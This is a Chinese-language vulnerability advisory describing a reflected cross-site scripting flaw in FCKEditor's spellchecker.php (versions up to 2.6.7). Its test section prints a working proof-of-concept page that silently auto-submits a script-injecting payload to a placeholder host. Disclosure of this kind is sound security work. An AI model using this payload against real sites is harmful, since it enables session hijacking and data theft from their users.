漏洞起因
跨站脚本错误
危险等级
低
影响系统
FCKEditor <= 2.6.7
不受影响系统
危害
远程攻击者可以利用漏洞获取敏感信息或劫持用户会话。
攻击所需条件
攻击者必须构建恶意URI,诱使用户解析。
漏洞信息
FCKeditor是一个功能强大支持所见即所得功能的文本编辑器。
FCKeditor “spellchecker.php”存在跨站脚本错误,攻击者可以构建恶意URI,诱使用户解析,获取敏感信息或劫持用户会话。
测试方法
#——— File: fsck_editor.html ———–#
<html>
<body>
<iframe style=”width: 1px; height: 1px; visibility: hidden”
name=”hidden”></iframe>
<form method=”post” name=”sender”
action=”http://vuln.com//fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php“;
target=”hidden”>
<input type=”hidden” name=”textinputs[]” value='”);alert(“THIS SITE
IS XSS VULNERABLE!”);</script><!–‘ />
</form>
</body>
<script>document.sender.submit(); </script>
</html>
#—————————————————–#
厂商解决方案
目前没有详细解决方案提供:
http://www.ckeditor.com/
漏洞提供者
Emilio Pinna
评论关闭。